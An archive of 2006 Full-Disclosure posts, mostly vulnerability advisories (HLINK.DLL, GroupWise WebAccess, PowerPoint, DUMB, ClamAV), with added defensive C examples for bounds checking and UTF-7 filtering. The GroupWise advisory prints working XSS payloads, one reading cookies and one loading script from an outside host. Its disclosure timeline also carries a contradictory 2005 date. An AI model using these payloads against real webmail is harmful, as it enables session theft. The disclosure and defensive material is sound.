URI expansion will fail and the WzCopy() will never be reached.
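
What the advisory describes is a copy whose only stopping condition is the source's terminator, into a stack buffer of fixed size. The C below is an added example, not TippingPoint's or Microsoft's code and not HLINK.DLL's real implementation: it models the sink with a stack buffer of the advisory's 0x0E2C bytes (1814 UTF-16 code units) and shows the capacity check that the unchecked WzCopy() lacks, so a display name that does not fit is refused before a single byte is written. The names wz_copy_bounded, show_target and make_uri, and the error convention, are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The sizes are the advisory's: the overflowed buffer sits 0x0E2C bytes
 * below the frame pointer, so 0x0E2C bytes (1814 UTF-16 code units) is all
 * the room there is. Names and return codes are this example's own. */
#define HLINK_BUF_BYTES   0x0E2C
#define HLINK_BUF_WCHARS  (HLINK_BUF_BYTES / 2)

typedef uint16_t wz_t;            /* one UTF-16 code unit (the "ushort") */

/* Length in code units, excluding the terminator. */
static size_t wz_len(const wz_t *s)
{
    size_t n = 0;
    while (s[n] != 0)
        n++;
    return n;
}

/* Bounded replacement for an unchecked wide-string copy: refuses anything
 * that does not fit, terminator included, and leaves dst empty rather than
 * half-filled on failure. Returns 0 on success, -1 when src is too long. */
int wz_copy_bounded(wz_t *dst, size_t dst_cap, const wz_t *src)
{
    size_t n = wz_len(src);
    if (dst_cap == 0)
        return -1;
    if (n + 1 > dst_cap) {
        dst[0] = 0;
        return -1;
    }
    memcpy(dst, src, (n + 1) * sizeof(wz_t));
    return 0;
}

/* Model of the sink: by the time the display name reaches this point it is
 * the fully expanded URI (after any redirect), which is why the length of
 * the final Location: target, not the link in the document, is what counts.
 * Returns 1 if the name was accepted into the stack buffer, 0 if refused. */
int show_target(const wz_t *display_name)
{
    wz_t buf[HLINK_BUF_WCHARS];       /* fixed stack buffer, as in the advisory */
    return wz_copy_bounded(buf, HLINK_BUF_WCHARS, display_name) == 0;
}

/* Constructed input: n 'A' code units in a static buffer (capped so the
 * helper itself can never overrun). */
const wz_t *make_uri(size_t n)
{
    static wz_t uri[8192];
    if (n > sizeof uri / sizeof uri[0] - 1)
        n = sizeof uri / sizeof uri[0] - 1;
    for (size_t k = 0; k < n; k++)
        uri[k] = 'A';
    uri[n] = 0;
    return uri;
}

int main(void)
{
    printf("1000 code units: %s\n", show_target(make_uri(1000)) ? "accepted" : "refused");
    printf("4000 code units: %s\n", show_target(make_uri(4000)) ? "accepted" : "refused");
    return 0;
}
```

Run stand-alone it reports the 1000-unit name accepted and the 4000-unit one refused; the boundary is 1813 code units plus the terminator. The same reasoning is the defender's detection angle: a target that only becomes oversized after a redirect is followed is exactly the case a filter that inspects the document's own link text will miss.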

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS06-050.mspx

-- Disclosure Timeline:
2006.02.28 - Vulnerability reported to vendor
2006.08.08 - Digital Vaccine released to TippingPoint customers
2006.08.08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Much Ado Over Whether Lieberman Campaign Site Was Hacked

2006-08-08 Thread kaiser scapegoat
MSNBC has been reporting that the Lieberman campaign site was hacked. There 
have been numerous theories on this since it was reported yesterday. Thought 
you all might be interested in the attempt at technical analysis taking 
place on Daily Kos:


http://www.dailykos.com/story/2006/8/8/144119/5628

_
Don’t just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ISR] - Novell Groupwise Webaccess (Cross-Site Scripting)

2006-08-08 Thread Francisco Amato
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

:: 
 :: [ISR]
 :: Infobyte Security Research 
 :: www.infobyte.com.ar
 :: 08.08.2006 
::


.:: SUMMARY

Novell Groupwise WebAccess Cross-Site Scripting

Version: Novell GroupWise WebAccess 7, 6.5
It is suspected that all previous versions of Groupwise WebAccess are
vulnerable.

.:: BACKGROUND

GroupWise WebAccess is Novell's premier Intranet/Internet GroupWare
solution for the Web.

More info:http://www.novell.com

.:: DESCRIPTION

Remote exploitation of Cross-Site Scripting due to failure of the
application to properly sanitize user-supplied input prior to including
it in dynamically generated Web content.

Example 1:
- - -
Description: The filter of Groupwise doesn't check UTF-7 encoding.
By sending an email with the following HTML code we can execute JavaScript
code in the context of the authenticated user's browser.

<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
+ADw-SCRIPT+AD4-alert(document.cookie);+ADw-/SCRIPT+AD4-
</html>


Example 2:
- - -
Description: The filter of Groupwise doesn't sanitize the following code

<html>
<SCRIPT/XSS SRC="http://www.infobyte.com.ar/xss/xss.js"></SCRIPT>
<SCRIPT></SCRIPT>
</html>

These are simple example codes to execute script in the browser of an
unsuspecting user.
These issues may allow for the theft of authentication credentials.
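
Example 1 works because a filter that scans for literal angle brackets never sees one: +ADw- and +AD4- only become < and > once the browser honours the UTF-7 charset declaration. The C below is an added example, not Infobyte's or Novell's code: it decodes the "+...-" runs of a message as UTF-7 and flags any that produce < or >, and separately flags a charset=UTF-7 declaration, which is the check a webmail HTML filter needs in addition to its literal tag search. The function names and both sample messages are constructed for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Base64 alphabet used by UTF-7's "+...-" runs; -1 for anything else. */
static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decodes every "+<base64>-" run as UTF-16BE and returns 1 if any decoded
 * code unit is '<' or '>', i.e. if the text turns into markup once a browser
 * applies UTF-7. "+-" (a literal plus) and stray plus signs in ordinary
 * text decode to nothing of interest and yield 0. */
int utf7_decodes_to_markup(const char *s)
{
    size_t i = 0;
    while (s[i]) {
        if (s[i] != '+') { i++; continue; }
        i++;                                   /* step past the '+' */
        uint32_t bits = 0;
        int nbits = 0;
        while (s[i] && b64val((unsigned char)s[i]) >= 0) {
            bits = (bits << 6) | (uint32_t)b64val((unsigned char)s[i]);
            nbits += 6;
            if (nbits >= 16) {
                uint16_t cu = (uint16_t)(bits >> (nbits - 16));
                nbits -= 16;
                bits &= (1u << nbits) - 1u;
                if (cu == '<' || cu == '>')
                    return 1;
            }
            i++;
        }
        if (s[i] == '-')
            i++;                               /* '-' closes the run and is absorbed */
    }
    return 0;
}

/* Case-insensitive "does s start with lit", where lit is lowercase ASCII. */
static int ci_prefix(const char *s, const char *lit)
{
    for (; *lit; s++, lit++)
        if (!*s || tolower((unsigned char)*s) != (unsigned char)*lit)
            return 0;
    return 1;
}

/* 1 if the HTML carries a charset=UTF-7 declaration (spaces and quotes
 * after '=' tolerated), such as the META tag in Example 1 above. */
int declares_utf7_charset(const char *html)
{
    for (const char *p = html; *p; p++) {
        if (!ci_prefix(p, "charset="))
            continue;
        const char *q = p + 8;
        while (*q == ' ' || *q == '"' || *q == '\'')
            q++;
        if (ci_prefix(q, "utf-7"))
            return 1;
    }
    return 0;
}

/* Filter decision: a message that declares UTF-7, or whose body decodes to
 * angle brackets under UTF-7, must not be rendered as-is, whatever a plain
 * search for "<script>" found. */
int html_mail_is_unsafe(const char *html)
{
    return declares_utf7_charset(html) || utf7_decodes_to_markup(html);
}

/* Constructed sample in the shape of Example 1 above. */
const char sample_utf7_mail[] =
    "<html><head>"
    "<META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\">"
    "</head>"
    "+ADw-SCRIPT+AD4-alert(document.cookie);+ADw-/SCRIPT+AD4-"
    "</html>";

/* Constructed benign sample: plus signs that are not UTF-7 runs. */
const char sample_plain_mail[] =
    "<html><body><p>Meeting moved to 2+2=4 pm; bring the C++ notes.</p></body></html>";

int main(void)
{
    printf("utf7 sample unsafe: %d\n", html_mail_is_unsafe(sample_utf7_mail));
    printf("plain sample unsafe: %d\n", html_mail_is_unsafe(sample_plain_mail));
    return 0;
}
```

Decoding rather than pattern-matching the encoded form is deliberate: +ADw- is only one of several base64 alignments that yield a < once preceding characters shift the bit boundary, so a blocklist of known sequences would be bypassed again. Rejecting or re-encoding the message to a fixed charset before filtering is the complementary fix on the rendering side.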

.:: VENDOR RESPONSE

Vendor advisory:
   
http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=3701584&sliceId=SAL_Public&dialogID=8568328&stateId=0%200%208572233

Vendor patch:
Hot Patch for GroupWise 7:
http://support.novell.com/filefinder/20641/beta.html
Field Test File for GroupWise 6.5:
http://support.novell.com/filefinder/16963/beta.html

.:: CVE INFORMATION

Id: CVE-2006-3817
Web: http://cve.mitre.org

.:: DISCLOSURE TIMELINE

05/26/2006  Initial vendor notification
05/26/2006  Initial vendor response
07/31/2005  Coordinated public disclosure

.:: CREDIT

Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar

.:: ADVISORY

http://www.infobyte.com.ar/adv/ISR-14.html

.:: LEGAL NOTICES

Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as
it is not edited in any way unless authorized by Infobyte Security Research
Response. Reprinting the whole or part of this alert in any medium other
than electronically requires permission from infobyte com ar

Disclaimer
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. Use of the information
constitutes acceptance for use in an AS IS condition. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.0.6 (Build 6060)

iQA/AwUBRNjnr3s2oPjapNRZEQL2PACdG+dBRMiOzRJU+uGmd12yzBKpxo8AoL65
wNMwLcHW71e5bBcwrAvyg8Xh
=jVVp
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Microsoft PowerPoint Malformed Record Memory Corruption

2006-08-08 Thread Sowhat

Microsoft PowerPoint Malformed Record Memory Corruption Vulnerability


By Sowhat of Nevis Labs
2006.08.08

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060808.txt



Vendor
Microsoft Inc.

Microsoft PowerPoint 2000
Microsoft PowerPoint 2002
Microsoft Office PowerPoint 2003
PowerPoint 2004 for Mac
PowerPoint 2004 v. X for Mac


Remote: YES
Exploitable: maybe ;)

CVE: CVE-2006-3449



Overview:

This vulnerability allows remote attackers to execute arbitrary code in
the context of the logged in user. An array boundary condition may be
violated by a malicious .PPT file in order to redirect execution into
attacker-supplied data. Exploitation requires that the attacker coerce or
persuade the victim to open a malicious .PPT file.


Details:

The specific flaw exists within the parsing of the BIFF(?) file format used
by Microsoft PowerPoint.


A memory corruption occurs during the analysis of a malformed PPT record.


The disassembly code:


3009a818 3945fc   cmp [ebp-0x4],eax
3009a81b 7703 ja  POWERPNT+0x9a820 (3009a820)
3009a81d 8b45fc   mov eax,[ebp-0x4]
3009a820 8b7308   mov esi,[ebx+0x8]
3009a823 8b7d08   mov edi,[ebp+0x8]
3009a826 2945fc   sub [ebp-0x4],eax
3009a829 014508   add [ebp+0x8],eax
3009a82c 8bc8 mov ecx,eax
3009a82e 8bd1 mov edx,ecx
3009a830 c1e902   shr ecx,0x2
3009a833 f3a5 rep movsd 
 Access violation here. :)
3009a835 8bca mov ecx,edx
3009a837 83e103   and ecx,0x3
3009a83a f3a4 rep movsb
3009a83c 014308   add [ebx+0x8],eax
3009a83f 014318   add [ebx+0x18],eax
3009a842 837dfc00 cmp dword ptr [ebp-0x4],0x0
3009a846 75b7 jnz POWERPNT+0x9a7ff (3009a7ff)
3009a848 8b450c   mov eax,[ebp+0xc]
3009a84b 5f   pop edi
3009a84c 5e   pop esi
3009a84d 5b   pop ebx
3009a84e c9   leave
3009a84f c20800   ret 0x8


Code execution may be possible.
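
The listing above copies a run of dwords and then bytes (rep movsd / rep movsb) with a count derived from the file, and faults inside that copy. The C below is an added example, not Sowhat's or Microsoft's code and not the real PowerPoint record format: it parses a hypothetical record stream (2-byte type, 4-byte little-endian length, then payload, a layout assumed only for this example) and performs the two checks a file-supplied length needs before any memcpy: it must be covered by the bytes actually present, and it must fit the destination. The constructed sample streams are a well-formed file, one that overclaims its length, and one whose payload is really present but larger than the destination.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical record layout (this example's own, not the PPT format):
 * uint16 type, uint32 little-endian payload length, then the payload.
 * The fixed-size destination stands in for the buffer the copy filled. */
#define REC_HDR      6
#define MAX_PAYLOAD  64

typedef struct {
    uint16_t type;
    uint32_t length;
    uint8_t  payload[MAX_PAYLOAD];
} record_t;

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walks the stream and copies each record into out[]. Returns the number
 * of records, or -1 for a malformed stream. The memcpy is reached only when
 * the declared length is covered by the bytes actually present AND fits the
 * destination; the declared length on its own decides nothing. */
int parse_records(const uint8_t *buf, size_t len, record_t *out, size_t max_out)
{
    size_t off = 0;
    int count = 0;

    while (off < len) {
        if (len - off < REC_HDR)
            return -1;                      /* truncated header */
        uint16_t type = rd16(buf + off);
        uint32_t rlen = rd32(buf + off + 2);
        off += REC_HDR;

        if (rlen > len - off)
            return -1;                      /* claims more input than exists */
        if (rlen > MAX_PAYLOAD)
            return -1;                      /* would overflow the destination */
        if ((size_t)count >= max_out)
            return -1;                      /* no room for another record */

        out[count].type = type;
        out[count].length = rlen;
        memcpy(out[count].payload, buf + off, rlen);   /* both bounds checked */
        off += rlen;
        count++;
    }
    return count;
}

/* Constructed sample streams (not taken from any real file). */
static const uint8_t good_stream[] = {
    0x01, 0x00,  0x03, 0x00, 0x00, 0x00,  'a', 'b', 'c',
    0x02, 0x00,  0x02, 0x00, 0x00, 0x00,  'x', 'y'
};
/* One record whose header claims 0xFFFF0000 bytes but is followed by 3. */
static const uint8_t overclaim_stream[] = {
    0x01, 0x00,  0x00, 0x00, 0xFF, 0xFF,  'a', 'b', 'c'
};

int parse_good(void)
{
    record_t r[4];
    return parse_records(good_stream, sizeof good_stream, r, 4);            /* 2 */
}

int good_second_type(void)
{
    record_t r[4];
    if (parse_records(good_stream, sizeof good_stream, r, 4) != 2)
        return -1;
    return r[1].type;                                                        /* 2 */
}

int parse_overclaim(void)
{
    record_t r[4];
    return parse_records(overclaim_stream, sizeof overclaim_stream, r, 4);  /* -1 */
}

/* A 100-byte payload that really is present but exceeds MAX_PAYLOAD: the
 * input-length check passes, the destination check still has to catch it. */
int parse_oversize(void)
{
    uint8_t big[REC_HDR + 100];
    record_t r[4];
    memset(big, 'Z', sizeof big);
    big[0] = 0x03; big[1] = 0x00;
    big[2] = 100;  big[3] = 0x00; big[4] = 0x00; big[5] = 0x00;
    return parse_records(big, sizeof big, r, 4);                             /* -1 */
}

int main(void)
{
    printf("good: %d  overclaim: %d  oversize: %d\n",
           parse_good(), parse_overclaim(), parse_oversize());
    return 0;
}
```

The oversize case is the one worth noting for a parser of this kind: clamping a length to the bytes remaining in the input, as the cmp/ja pair at the top of the listing appears to do, says nothing about whether the destination can hold it.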


POC:

No POC will be supplied


Fix:

Microsoft has released an update for Microsoft Office which is
set to address this issue. This can be downloaded from:

http://www.microsoft.com/technet/security/bulletin/MS06-048.mspx


Vendor Response:

2006.07.14 Vendor notified via [EMAIL PROTECTED]
2006.07.15 Vendor responded
2006.08.08 Vendor released MS06-048 patch
2006.08.08 Advisory released


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


   CVE-2006-3449




Greetings to Becky PhD. ;)


Reference:

1. http://www.microsoft.com/technet/security/Bulletin/MS06-048.mspx
2. http://secway.org/vuln.htm



--
Sowhat
http://secway.org
Life is like a bug, Do you know how to exploit it ?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ GLSA 200608-14 ] DUMB: Heap buffer overflow

2006-08-08 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200608-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: DUMB: Heap buffer overflow
  Date: August 08, 2006
  Bugs: #142387
ID: 200608-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A heap-based buffer overflow in DUMB could result in the execution of
arbitrary code.

Background
==========

DUMB (Dynamic Universal Music Bibliotheque) is an IT, XM, S3M and MOD
player library.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  media-libs/dumb                < 0.9.3-r1               >= 0.9.3-r1

Description
===========

Luigi Auriemma found a heap-based buffer overflow in the
it_read_envelope function which reads the envelope values for volume,
pan and pitch of the instruments referenced in a .it (Impulse
Tracker) file with a large number of nodes.

Impact
======

By enticing a user to load a malicious .it (Impulse Tracker) file, an
attacker may execute arbitrary code with the rights of the user running
the application that uses a vulnerable DUMB library.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All users of DUMB should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =media-libs/dumb-0.9.3-r1

References
==========

  [ 1 ] CVE-2006-3668
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3668

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200608-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Much Ado Over Whether Lieberman Campaign Site Was Hacked

2006-08-08 Thread Rowland
Some questioning of the Kos version here:

http://www.brendanloy.com/2006/08/apparent-dos-attack-takes-out-lieberman-website.html


On Tue, 2006-08-08 at 15:21, kaiser scapegoat wrote:
> MSNBC has been reporting that the Lieberman campaign site was hacked. There
> have been numerous theories on this since it was reported yesterday. Thought
> you all might be interested in the attempt at technical analysis taking
> place on Daily Kos:
>
> http://www.dailykos.com/story/2006/8/8/144119/5628
>
> _
> Dont just search. Find. Check out the new MSN Search!
> http://search.msn.click-url.com/go/onm00200636ave/direct/01/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-- 
---
My skills and contact info: http://www.blcss.com/contactme.php
Public Freenet gateway: http://blcss.com/cgi-bin/fr.pl


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Much Ado Over Whether Lieberman CampaignSite Was Hacked

2006-08-08 Thread kaiser scapegoat
Hmmm - Lieberman forgot to pay his bills was the story yesterday - when 
the default page said to call the billing department.


Much discussion ensued from the accusation yesterday, and Lieberman was 
surely aware of all the questions when he called a press conference this 
morning to blame the Lamont campaign.


This was an 11th hour drop letter Rovian tactic if there ever was one. 
Even if Lieberman doesn't know what's going on with his server, he certainly 
engineered the way he's exploiting it. The focus is not on getting the site 
back up or accepting Lamont's proffered help - the focus is on getting the 
mainstream media to report that Lieberman has accused Lamont supporters of 
hacking. And the mainstream media fell for it: MSNBC, CNN, New York Times...


Kos is now just saying Lieberman is paying the price for skimping on the web 
site:


http://www.dailykos.com/story/2006/8/8/153827/3493


Alternatively...someone attempting to explain why the site is still down:

http://www.dailykos.com/story/2006/8/8/172032/7796






From: Rowland [EMAIL PROTECTED]
To: kaiser scapegoat [EMAIL PROTECTED]
CC: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Much Ado Over Whether Lieberman CampaignSite 
Was Hacked

Date: 08 Aug 2006 17:01:28 -0400

Some questioning of the Kos version here:

http://www.brendanloy.com/2006/08/apparent-dos-attack-takes-out-lieberman-website.html


On Tue, 2006-08-08 at 15:21, kaiser scapegoat wrote:
> MSNBC has been reporting that the Lieberman campaign site was hacked. There
> have been numerous theories on this since it was reported yesterday. Thought
> you all might be interested in the attempt at technical analysis taking
> place on Daily Kos:
>
> http://www.dailykos.com/story/2006/8/8/144119/5628
>
> _
> Dont just search. Find. Check out the new MSN Search!
> http://search.msn.click-url.com/go/onm00200636ave/direct/01/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
---
My skills and contact info: http://www.blcss.com/contactme.php
Public Freenet gateway: http://blcss.com/cgi-bin/fr.pl




_
Don’t just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Much Ado Over Whether Lieberman Campaign Site Was Hacked

2006-08-08 Thread Philosophil

Ha!

I had a pretty good laugh at that attempt.  While not as bad as
tubes full of internets, Kos should stick to punditry.

On 8/8/06, kaiser scapegoat [EMAIL PROTECTED] wrote:

> MSNBC has been reporting that the Lieberman campaign site was hacked. There
> have been numerous theories on this since it was reported yesterday. Thought
> you all might be interested in the attempt at technical analysis taking
> place on Daily Kos:
>
> http://www.dailykos.com/story/2006/8/8/144119/5628
>
> _
> Don't just search. Find. Check out the new MSN Search!
> http://search.msn.click-url.com/go/onm00200636ave/direct/01/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: Will Microsoft patch remarkable old Msjet40.dll issue?

2006-08-08 Thread Juha-Matti Laurio

New monthly updates from Microsoft don't include a patch for the Msjet40.dll
vulnerability affecting Access and some other products.

There is a patch for the critical 0-day vulnerability in PowerPoint, aka the
Mso.dll vulnerability (CVE-2006-3590):
http://www.microsoft.com/technet/security/bulletin/ms06-048.mspx

- Juha-Matti

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] Re: micosoft.com xss

2006-08-08 Thread Thomas Pollet
Painfully obvious, yet I did pwn about every megacorp on the block :p

On 08/08/06, Mad World [EMAIL PROTECTED] wrote:
> For such words you could eat your hat if I would like to go in public.
> It's the last time I am teaching script kiddies something beyond their
> understanding. I would like that you have at least a small area in your
> brains that restricts your tongue. If you wouldn't be a script kiddie you
> would take your words back and learn instead.
> Yesterday's code is here:
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDKSA-2006:138 ] - Updated clamav packages fix vulnerability

2006-08-08 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:138
 http://www.mandriva.com/security/
 ___
 
 Package : clamav
 Date: August 8, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Damian Put discovered a boundary error in the UPX extraction module in
 ClamAV which is used to unpack PE Windows executables.  This could be
 abused to cause a Denial of Service issue and potentially allow for
 the execution of arbitrary code with the permissions of the user
 running clamscan or clamd.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4018
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 7160be474b24613a61e0544bc51f7f86  
2006.0/RPMS/clamav-0.88.4-0.1.20060mdk.i586.rpm
 8eaf5d27daa93c18117d72991d04f6a2  
2006.0/RPMS/clamav-db-0.88.4-0.1.20060mdk.i586.rpm
 27781d61cf85dd88b8d83586d4831e1c  
2006.0/RPMS/clamav-milter-0.88.4-0.1.20060mdk.i586.rpm
 ee41c72a28b45af3a8bc8a01b24680c1  
2006.0/RPMS/clamd-0.88.4-0.1.20060mdk.i586.rpm
 0a9fb0940a123a7347920c22a9453282  
2006.0/RPMS/libclamav1-0.88.4-0.1.20060mdk.i586.rpm
 89af9807ff0787621c51c0a6cf2545a0  
2006.0/RPMS/libclamav1-devel-0.88.4-0.1.20060mdk.i586.rpm
 034456a7e7e5c583403c69b06fb2b7c0  
2006.0/SRPMS/clamav-0.88.4-0.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 8fc81c2d735a98c48c84abc4654c947e  
x86_64/2006.0/RPMS/clamav-0.88.4-0.1.20060mdk.x86_64.rpm
 0b306fe32d6e833e1ac45bd485fa2e93  
x86_64/2006.0/RPMS/clamav-db-0.88.4-0.1.20060mdk.x86_64.rpm
 fba26b042f08e0edbea94f26e3b0093e  
x86_64/2006.0/RPMS/clamav-milter-0.88.4-0.1.20060mdk.x86_64.rpm
 50fc585d63d14daceeec889d52f4e1e1  
x86_64/2006.0/RPMS/clamd-0.88.4-0.1.20060mdk.x86_64.rpm
 cf9e501d41c3951c158647aeb28a018f  
x86_64/2006.0/RPMS/lib64clamav1-0.88.4-0.1.20060mdk.x86_64.rpm
 9734f7d218bf446ac403584198d035bd  
x86_64/2006.0/RPMS/lib64clamav1-devel-0.88.4-0.1.20060mdk.x86_64.rpm
 034456a7e7e5c583403c69b06fb2b7c0  
x86_64/2006.0/SRPMS/clamav-0.88.4-0.1.20060mdk.src.rpm

 Corporate 3.0:
 8995669334c70e4abe03a130291ceee3  
corporate/3.0/RPMS/clamav-0.88.4-0.1.C30mdk.i586.rpm
 b4d5bb40c553484ece891b5ccf6b9946  
corporate/3.0/RPMS/clamav-db-0.88.4-0.1.C30mdk.i586.rpm
 beca95463cea696152f9b25f57fee24c  
corporate/3.0/RPMS/clamav-milter-0.88.4-0.1.C30mdk.i586.rpm
 35dd7bff362ed54c8e052ba3182bff91  
corporate/3.0/RPMS/clamd-0.88.4-0.1.C30mdk.i586.rpm
 620db7610ccc4c7b05d0580634217e14  
corporate/3.0/RPMS/libclamav1-0.88.4-0.1.C30mdk.i586.rpm
 943964d75379bfbf9db16aa44a6965a4  
corporate/3.0/RPMS/libclamav1-devel-0.88.4-0.1.C30mdk.i586.rpm
 2ae9a4d818dce236123140f9edbaa742  
corporate/3.0/SRPMS/clamav-0.88.4-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 873e244792ddb282ba7d5d3780644198  
x86_64/corporate/3.0/RPMS/clamav-0.88.4-0.1.C30mdk.x86_64.rpm
 45a538b5fc07847628b32f4346f4683e  
x86_64/corporate/3.0/RPMS/clamav-db-0.88.4-0.1.C30mdk.x86_64.rpm
 5eef3b58eba440748a40d144adc9f36c  
x86_64/corporate/3.0/RPMS/clamav-milter-0.88.4-0.1.C30mdk.x86_64.rpm
 e2cb732e7b7a676a330784f2414d7700  
x86_64/corporate/3.0/RPMS/clamd-0.88.4-0.1.C30mdk.x86_64.rpm
 686e984920647ab725f6a79249673663  
x86_64/corporate/3.0/RPMS/lib64clamav1-0.88.4-0.1.C30mdk.x86_64.rpm
 78e63226b709d850781813c2e5ea9b08  
x86_64/corporate/3.0/RPMS/lib64clamav1-devel-0.88.4-0.1.C30mdk.x86_64.rpm
 2ae9a4d818dce236123140f9edbaa742  
x86_64/corporate/3.0/SRPMS/clamav-0.88.4-0.1.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

